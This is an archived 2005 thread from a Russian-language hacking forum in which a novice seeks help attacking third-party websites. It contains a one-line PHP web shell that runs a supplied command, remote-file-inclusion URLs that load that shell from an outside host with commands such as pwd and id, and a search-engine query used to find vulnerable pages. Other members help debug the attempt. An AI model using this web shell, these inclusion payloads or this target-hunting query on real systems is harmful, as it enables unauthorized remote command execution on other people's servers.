ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
25.05.2005, 23:30
|
|
Новичок
Регистрация: 12.03.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
shel.php
Здрасьте, sorry, что пишу не по теме, но! У меня есть файл с шелом на .народ.ру вот содержимое этого сайта
<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "<?php echo "<pre>" ; PassThru($cmd) ; echo "</pre>"; echo "php shell by 310003102 haked by x32ph" ?> " ?>
По идее если сайт бажный, то он мне должен выдать
php shell by 310003102 haked by x32ph так вот, он мне выдает все это дело. Я пишу в адресной строке: http://www.XXX.xxx/index.php?page=ht....XXX.narod.ru/
shel.php&cmd=pwd почему он не выдает мне мои правыа??? Что я не так делаю? |
|
|
25.05.2005, 23:35
|
|
Новичок
Регистрация: 12.03.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
Да, и еще! В поисковике я пишу allinurl: "index.php?page=news.php" что не так???
|
|
|
|
25.05.2005, 23:41
|
|
Новичок
Регистрация: 12.03.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
Вот на такой запрос /index.php?page=http://www.***.narod.ru/shel.php;&cmd=id
он мне выдал Warning: main(): Failed opening 'http://www.x32ph.narod.ru/666.php;' for inclusion (include_path='.') in /home/htdocs/web12/html/kerken/index.php on line 38
|
|
|
|
25.05.2005, 23:45
|
|
Участник форума
Регистрация: 24.11.2004
Сообщений: 126
Провел на форуме:
137630
Репутация:
11
|
|
тсареешь =)) в гугле уже дааавно это всё пофиксили, терь этим не воспользуешься... это раз...
по поводу шела.. ты тооочно уверен, что возможно Sql-инъекция?
+ у тя ошибка в самом шеле...
+ он тебе НЕ выдаст то, что ты хочешь.. хакед бай Вася Пупкин... так как ты задаёшь ему параметр пвд.. он те теоретически должен выдать путь к тому, где находится данная страница, на которой ты выполняешь шелл-команды...
вроде всё так... могу ошибатся
ЗЫ: haCked пишется с буквой "с" =)
|
|
|
|
26.05.2005, 00:23
|
|
Новичок
Регистрация: 12.03.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
Эй, люди, подскажите тогда какой поисковит юзать! Да и че в шеле не так???
|
|
|
|
26.05.2005, 21:52
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
а я не понял почему ты после shel.php пишешь знак & , а не ?
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
27.05.2005, 17:51
|
|
Новичок
Регистрация: 12.03.2005
Сообщений: 2
Провел на форуме:
0
Репутация:
0
|
|
А какая собственно разница & - так тож работает -)))
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
